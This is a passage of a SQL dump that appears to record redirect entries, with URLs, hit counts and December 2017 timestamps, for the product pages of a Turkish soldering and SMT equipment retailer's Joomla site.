14:05:19','0000-00-00 00:00:00',301),(15005,'http://3s-technologies.com.tr/en/home2/81-english-uk/english-content',NULL,'','',31,0,'2017-12-01 14:33:17','0000-00-00 00:00:00',301),(15006,'http://www.3s-technologies.com.tr/index.php/en/products/ly-8c-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-01 14:38:24','0000-00-00 00:00:00',301),(15007,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,ordering',NULL,'','',9,0,'2017-12-01 14:46:13','0000-00-00 00:00:00',301),(15008,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name/results,1-20',NULL,'','',4,0,'2017-12-01 14:54:24','0000-00-00 00:00:00',301),(15009,'http://3s-technologies.com.tr/index.php/tr/ueruenler/avf-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-01 14:59:53','0000-00-00 00:00:00',301),(15010,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-01 15:03:55','0000-00-00 00:00:00',301),(15011,'http://3s-technologies.com.tr/en/products/smd-fırın/by,category_name',NULL,'','',417,0,'2017-12-01 15:37:59','0000-00-00 00:00:00',301),(15012,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name?language=tr-tr',NULL,'','',18,0,'2017-12-01 15:38:21','0000-00-00 00:00:00',301),(15013,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name/results,1-10',NULL,'','',3,0,'2017-12-01 16:08:02','0000-00-00 00:00:00',301),(15014,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-12-01 16:25:53','0000-00-00 00:00:00',301),(15015,'http://3s-technologies.com.tr/index.php/en/products/mx200lp-detail?tmpl=component&print=1',NULL,'','',15,0,'2017-12-01 17:02:45','0000-00-00 00:00:00',301),(15016,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2017-12-01 17:20:40','0000-00-00 00:00:00',301),(15017,'http://3s-technologies.com.tr/en/products/temizleme-makineleri/stencil-washer-eco-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-01 17:27:45','0000-00-00 00:00:00',301),(15018,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/by,category_name?language=en-gb',NULL,'','',3,0,'2017-12-01 17:28:19','0000-00-00 00:00:00',301),(15019,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.8mm-detail',NULL,'','',25,0,'2017-12-01 17:28:32','0000-00-00 00:00:00',301),(15020,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/results,1-100',NULL,'','',5,0,'2017-12-01 17:29:51','0000-00-00 00:00:00',301),(15021,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/dirdesc?language=en-gb',NULL,'','',25,0,'2017-12-01 17:34:43','0000-00-00 00:00:00',301),(15022,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_name/results,1-50',NULL,'','',1,0,'2017-12-01 19:08:02','0000-00-00 00:00:00',301),(15023,'http://3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name?language=en-gb',NULL,'','',2,0,'2017-12-01 19:12:35','0000-00-00 00:00:00',301),(15024,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,product_sku',NULL,'','',19,0,'2017-12-01 20:00:05','0000-00-00 00:00:00',301),(15025,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-01 20:14:08','0000-00-00 00:00:00',301),(15026,'http://3s-technologies.com.tr/index.php/en/products/manufacturers/mirae',NULL,'','',20,0,'2017-12-01 20:14:13','0000-00-00 00:00:00',301),(15027,'http://3s-technologies.com.tr/en/products/2.-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',16,0,'2017-12-01 20:18:59','0000-00-00 00:00:00',301),(15028,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku/results,1-20',NULL,'','',4,0,'2017-12-01 20:21:40','0000-00-00 00:00:00',301),(15029,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar',NULL,'','',26,0,'2017-12-01 20:22:44','0000-00-00 00:00:00',301),(15030,'http://www.3s-technologies.com.tr/tr/urunler/sp-18p-l-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-12-01 20:33:14','0000-00-00 00:00:00',301),(15031,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,ordering',NULL,'','',6,0,'2017-12-01 20:37:43','0000-00-00 00:00:00',301),(15032,'http://www.3s-technologies.com.tr/index.php/en/products/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-01 21:06:16','0000-00-00 00:00:00',301),(15033,'http://www.3s-technologies.com.tr/en/products/spartan-8s-8d-44-detail?tmpl=component&print=1',NULL,'','',34,0,'2017-12-01 21:13:48','0000-00-00 00:00:00',301),(15034,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',393,0,'2017-12-01 21:17:05','0000-00-00 00:00:00',301),(15035,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,product_name/results,1-5',NULL,'','',13,0,'2017-12-01 21:36:28','0000-00-00 00:00:00',301),(15036,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,product_name?language=tr-tr',NULL,'','',7,0,'2017-12-01 21:37:38','0000-00-00 00:00:00',301),(15037,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,`p`.product_sku/results,1-50',NULL,'','',5,0,'2017-12-01 21:42:53','0000-00-00 00:00:00',301),(15038,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',9,0,'2017-12-01 22:33:37','0000-00-00 00:00:00',301),(15039,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-5?language=en-gb',NULL,'','',4,0,'2017-12-01 22:40:45','0000-00-00 00:00:00',301),(15040,'http://www.3s-technologies.com.tr/en/products/manufacturer/smd-ultra-hä±z',NULL,'','',1,0,'2017-12-01 23:02:51','0000-00-00 00:00:00',301),(15041,'http://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-12-01 23:12:03','0000-00-00 00:00:00',301),(15042,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/kester',NULL,'','',47,0,'2017-12-01 23:12:59','0000-00-00 00:00:00',301),(15043,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-10?language=en-gb',NULL,'','',3,0,'2017-12-01 23:19:19','0000-00-00 00:00:00',301),(15044,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-28-detail',NULL,'','',7,0,'2017-12-01 23:23:18','0000-00-00 00:00:00',301),(15045,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,`p`.product_sku?language=tr-tr',NULL,'','',24,0,'2017-12-02 00:49:17','0000-00-00 00:00:00',301),(15046,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/dirdesc/results,1-50?language=en-gb',NULL,'','',5,0,'2017-12-02 00:49:19','0000-00-00 00:00:00',301),(15047,'https://www.3s-technologies.com.tr/en/products/smd-fırın/gf-12-hc-ht-detail',NULL,'','',1,0,'2017-12-02 01:02:35','0000-00-00 00:00:00',301),(15048,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2017-12-02 01:04:29','0000-00-00 00:00:00',301),(15049,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı?language=en-gb',NULL,'','',1,0,'2017-12-02 01:23:52','0000-00-00 00:00:00',301),(15050,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-sn63pb37-0.4mm-29-detail',NULL,'','',8,0,'2017-12-02 02:00:52','0000-00-00 00:00:00',301),(15051,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name?language=en-gb',NULL,'','',6,0,'2017-12-02 02:03:56','0000-00-00 00:00:00',301),(15052,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/spartan-8s-8d-detail/askquestion?tmpl=component',NULL,'','',23,0,'2017-12-02 02:07:35','0000-00-00 00:00:00',301),(15053,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/275-k100-1mm-28-detail',NULL,'','',24,0,'2017-12-02 02:17:16','0000-00-00 00:00:00',301),(15054,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku/results,1-10?language=en-gb',NULL,'','',3,0,'2017-12-02 02:19:19','0000-00-00 00:00:00',301),(15055,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/dirdesc',NULL,'','',49,0,'2017-12-02 02:22:54','0000-00-00 00:00:00',301),(15056,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name/results,1-100',NULL,'','',1,0,'2017-12-02 02:25:44','0000-00-00 00:00:00',301),(15057,'http://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',31,0,'2017-12-02 02:32:10','0000-00-00 00:00:00',301),(15058,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,category_name',NULL,'','',10,0,'2017-12-02 02:37:36','0000-00-00 00:00:00',301),(15059,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/results,1-20',NULL,'','',6,0,'2017-12-02 02:43:49','0000-00-00 00:00:00',301),(15060,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,product_name?language=en-gb',NULL,'','',8,0,'2017-12-02 02:50:08','0000-00-00 00:00:00',301),(15061,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/by,category_name?language=en-gb',NULL,'','',1,0,'2017-12-02 03:29:22','0000-00-00 00:00:00',301),(15062,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2017-12-02 03:30:02','0000-00-00 00:00:00',301),(15063,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim',NULL,'','',82,0,'2017-12-02 03:31:06','0000-00-00 00:00:00',301),(15064,'http://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-33-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-02 03:31:29','0000-00-00 00:00:00',301),(15065,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı',NULL,'','',217,0,'2017-12-02 03:34:20','0000-00-00 00:00:00',301),(15066,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,pc.ordering,product_name',NULL,'','',1,0,'2017-12-02 03:36:30','0000-00-00 00:00:00',301),(15067,'http://www.3s-technologies.com.tr/index.php/en/products/rh2-20-detail?tmpl=component&print=1',NULL,'','',23,0,'2017-12-02 03:55:01','0000-00-00 00:00:00',301),(15068,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-02 04:02:10','0000-00-00 00:00:00',301),(15069,'http://www.3s-technologies.com.tr/tr/urunler/spr-20-41-detail?tmpl=component&print=1',NULL,'','',32,0,'2017-12-02 04:19:58','0000-00-00 00:00:00',301),(15070,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,`p`.product_sku/results,1-10',NULL,'','',3,0,'2017-12-02 04:21:27','0000-00-00 00:00:00',301),(15071,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',52,0,'2017-12-02 04:22:12','0000-00-00 00:00:00',301),(15072,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,product_sku?language=tr-tr',NULL,'','',14,0,'2017-12-02 04:23:46','0000-00-00 00:00:00',301),(15073,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,`p`.product_sku/results,1-40',NULL,'','',3,0,'2017-12-02 04:47:09','0000-00-00 00:00:00',301),(15074,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/spr-20-41-42-detail',NULL,'','',28,0,'2017-12-02 05:00:01','0000-00-00 00:00:00',301),(15075,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_sku',NULL,'','',21,0,'2017-12-02 05:18:06','0000-00-00 00:00:00',301),(15076,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-02 05:22:20','0000-00-00 00:00:00',301),(15077,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-12-02 05:30:11','0000-00-00 00:00:00',301),(15078,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/jv131-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-02 06:09:18','0000-00-00 00:00:00',301),(15079,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-12-02 06:10:44','0000-00-00 00:00:00',301),(15080,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-12-02 06:17:32','0000-00-00 00:00:00',301),(15081,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',1,0,'2017-12-02 06:19:38','0000-00-00 00:00:00',301),(15082,'http://3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-02 06:44:37','0000-00-00 00:00:00',301),(15083,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-02 06:56:42','0000-00-00 00:00:00',301),(15084,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-5',NULL,'','',17,0,'2017-12-02 07:34:17','0000-00-00 00:00:00',301),(15085,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,`p`.product_sku/results,1-100',NULL,'','',1,0,'2017-12-02 07:44:35','0000-00-00 00:00:00',301),(15086,'http://3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,`p`.product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-02 08:09:15','0000-00-00 00:00:00',301),(15087,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',24,0,'2017-12-02 08:32:17','0000-00-00 00:00:00',301),(15088,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/by,mf_name?language=en-gb',NULL,'','',26,0,'2017-12-02 08:37:41','0000-00-00 00:00:00',301),(15089,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/3s-technologies.com.tr/joomla/tr/welcome',NULL,'','',3,0,'2017-12-02 08:38:30','0000-00-00 00:00:00',301),(15090,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-12-02 08:41:01','0000-00-00 00:00:00',301),(15091,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-02 08:41:57','0000-00-00 00:00:00',301),(15092,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,product_sku',NULL,'','',21,0,'2017-12-02 08:54:11','0000-00-00 00:00:00',301),(15093,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-02 08:59:04','0000-00-00 00:00:00',301),(15094,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-02 09:15:44','0000-00-00 00:00:00',301),(15095,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail',NULL,'','',24,0,'2017-12-02 09:19:25','0000-00-00 00:00:00',301),(15096,'http://3s-technologies.com.tr/index.php/tr/using-joomla/extensions/templates/beez-2/home-page-beez-2/80-turkish-tr/turkish-content/84-kester-lehimleme-malzemeleri',NULL,'','',7,0,'2017-12-02 09:24:50','0000-00-00 00:00:00',301),(15097,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-12-02 09:32:38','0000-00-00 00:00:00',301),(15098,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/dalga-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2017-12-02 09:47:46','0000-00-00 00:00:00',301),(15099,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-02 09:49:59','0000-00-00 00:00:00',301),(15100,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/275-k100-1mm-detail',NULL,'','',19,0,'2017-12-02 10:04:08','0000-00-00 00:00:00',301),(15101,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/index_01_250x250.jpg',NULL,'','',5,0,'2017-12-02 10:06:19','0000-00-00 00:00:00',301),(15102,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_250x250.jpg',NULL,'','',6,0,'2017-12-02 10:18:53','0000-00-00 00:00:00',301),(15103,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-20',NULL,'','',4,0,'2017-12-02 10:18:53','0000-00-00 00:00:00',301),(15104,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',209,0,'2017-12-02 10:21:43','0000-00-00 00:00:00',301),(15105,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=54&itemid=114',NULL,'','',14,0,'2017-12-02 10:22:08','0000-00-00 00:00:00',301),(15106,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=56&itemid=137',NULL,'','',14,0,'2017-12-02 10:22:16','0000-00-00 00:00:00',301),(15107,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=57&itemid=145',NULL,'','',14,0,'2017-12-02 10:22:28','0000-00-00 00:00:00',301),(15108,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=58&itemid=149',NULL,'','',14,0,'2017-12-02 10:22:37','0000-00-00 00:00:00',301),(15109,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=59&itemid=155',NULL,'','',14,0,'2017-12-02 10:22:46','0000-00-00 00:00:00',301),(15110,'http://3s-technologies.com.tr/en/?option=com_content&view=category&id=60&itemid=164',NULL,'','',14,0,'2017-12-02 10:22:57','0000-00-00 00:00:00',301),(15111,'http://3s-technologies.com.tr/en/?option=com_content&view=category&layout=blog&id=1&itemid=28',NULL,'','',6,0,'2017-12-02 10:23:05','0000-00-00 00:00:00',301),(15112,'http://3s-technologies.com.tr/en/?option=com_content&view=section&id=6&itemid=1',NULL,'','',12,0,'2017-12-02 10:23:10','0000-00-00 00:00:00',301),(15113,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',514,0,'2017-12-02 10:26:39','0000-00-00 00:00:00',301),(15114,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-02 10:26:41','0000-00-00 00:00:00',301),(15115,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',516,0,'2017-12-02 10:26:53','0000-00-00 00:00:00',301),(15116,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',505,0,'2017-12-02 10:27:04','0000-00-00 00:00:00',301),(15117,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',502,0,'2017-12-02 10:27:07','0000-00-00 00:00:00',301),(15118,'http://www.3s-technologies.com.tr/en/products/cs40-detail?tmpl=component&print=1',NULL,'','',42,0,'2017-12-02 10:29:28','0000-00-00 00:00:00',301),(15119,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',9,0,'2017-12-02 11:09:53','0000-00-00 00:00:00',301),(15120,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/by,category_name?language=tr-tr',NULL,'','',1,0,'2017-12-02 11:18:09','0000-00-00 00:00:00',301),(15121,'http://3s-technologies.com.tr/index.php/tr/ueruenler/av132-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-02 11:21:35','0000-00-00 00:00:00',301),(15122,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/aqueous',NULL,'','',37,0,'2017-12-02 11:35:11','0000-00-00 00:00:00',301),(15123,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-40',NULL,'','',4,0,'2017-12-02 11:41:09','0000-00-00 00:00:00',301),(15124,'http://www.3s-technologies.com.tr/en/products/smd-fä±rä±n',NULL,'','',9,0,'2017-12-02 11:41:31','0000-00-00 00:00:00',301),(15125,'http://3s-technologies.com.tr/index.php/en/products/flux/955lc-37-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-02 12:26:58','0000-00-00 00:00:00',301),(15126,'http://3s-technologies.com.tr/index.php/en/homepage2/81-english-uk/english-content/85-kester-lehimleme-malzemeleri',NULL,'','',14,0,'2017-12-02 12:44:44','0000-00-00 00:00:00',301),(15127,'http://3s-technologies.com.tr/index.php/tr/ueruenler/2.-el-makineler/jvk-detail/askquestion?tmpl=component',NULL,'','',13,0,'2017-12-02 12:46:38','0000-00-00 00:00:00',301),(15128,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',7,0,'2017-12-02 12:52:09','0000-00-00 00:00:00',301),(15129,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-02 12:53:09','0000-00-00 00:00:00',301),(15130,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/955lc-detail',NULL,'','',7,0,'2017-12-02 13:03:34','0000-00-00 00:00:00',301),(15131,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',212,0,'2017-12-02 13:10:32','0000-00-00 00:00:00',301),(15132,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-20',NULL,'','',7,0,'2017-12-02 13:24:00','0000-00-00 00:00:00',301),(15133,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',2,0,'2017-12-02 13:28:21','0000-00-00 00:00:00',301),(15134,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/955lc-detail',NULL,'','',32,0,'2017-12-02 14:06:11','0000-00-00 00:00:00',301),(15135,'http://www.3s-technologies.com.tr/index.php/en/products/245-k100-28-29-detail?tmpl=component&print=1',NULL,'','',24,0,'2017-12-02 14:11:37','0000-00-00 00:00:00',301),(15136,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/flux/by,category_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-02 14:33:31','0000-00-00 00:00:00',301),(15137,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-10',NULL,'','',2,0,'2017-12-02 14:35:59','0000-00-00 00:00:00',301),(15138,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&itemid=146&lang=tr',NULL,'','',1,0,'2017-12-02 14:37:07','0000-00-00 00:00:00',301),(15139,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,ordering',NULL,'','',197,0,'2017-12-02 15:06:50','0000-00-00 00:00:00',301),(15140,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,category_name?language=tr-tr',NULL,'','',7,0,'2017-12-02 15:22:50','0000-00-00 00:00:00',301),(15141,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-k100-28-29-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-02 15:47:19','0000-00-00 00:00:00',301),(15142,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',25,0,'2017-12-02 15:49:39','0000-00-00 00:00:00',301),(15143,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-02 15:58:16','0000-00-00 00:00:00',301),(15144,'http://www.3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/am100-detail',NULL,'','',53,0,'2017-12-02 16:19:04','0000-00-00 00:00:00',301),(15145,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-ultra-hız/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',51,0,'2017-12-02 16:30:26','0000-00-00 00:00:00',301),(15146,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',187,0,'2017-12-02 16:39:25','0000-00-00 00:00:00',301),(15147,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2017-12-02 16:48:30','0000-00-00 00:00:00',301),(15148,'http://3s-technologies.com.tr/index.php/tr/ueruenler/ls60v-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-02 16:54:26','0000-00-00 00:00:00',301),(15149,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-orta-hızlı/by,`p`.product_sku?language=tr-tr',NULL,'','',1,0,'2017-12-02 16:59:11','0000-00-00 00:00:00',301),(15150,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturers/tolo',NULL,'','',31,0,'2017-12-02 17:11:02','0000-00-00 00:00:00',301),(15151,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',496,0,'2017-12-02 17:24:43','0000-00-00 00:00:00',301),(15152,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',544,0,'2017-12-02 17:24:49','0000-00-00 00:00:00',301),(15153,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',524,0,'2017-12-02 17:24:59','0000-00-00 00:00:00',301),(15154,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',527,0,'2017-12-02 17:25:01','0000-00-00 00:00:00',301),(15155,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',573,0,'2017-12-02 17:25:11','0000-00-00 00:00:00',301),(15156,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',520,0,'2017-12-02 17:25:12','0000-00-00 00:00:00',301),(15157,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',530,0,'2017-12-02 17:25:19','0000-00-00 00:00:00',301),(15158,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',533,0,'2017-12-02 17:25:24','0000-00-00 00:00:00',301),(15159,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',519,0,'2017-12-02 17:25:28','0000-00-00 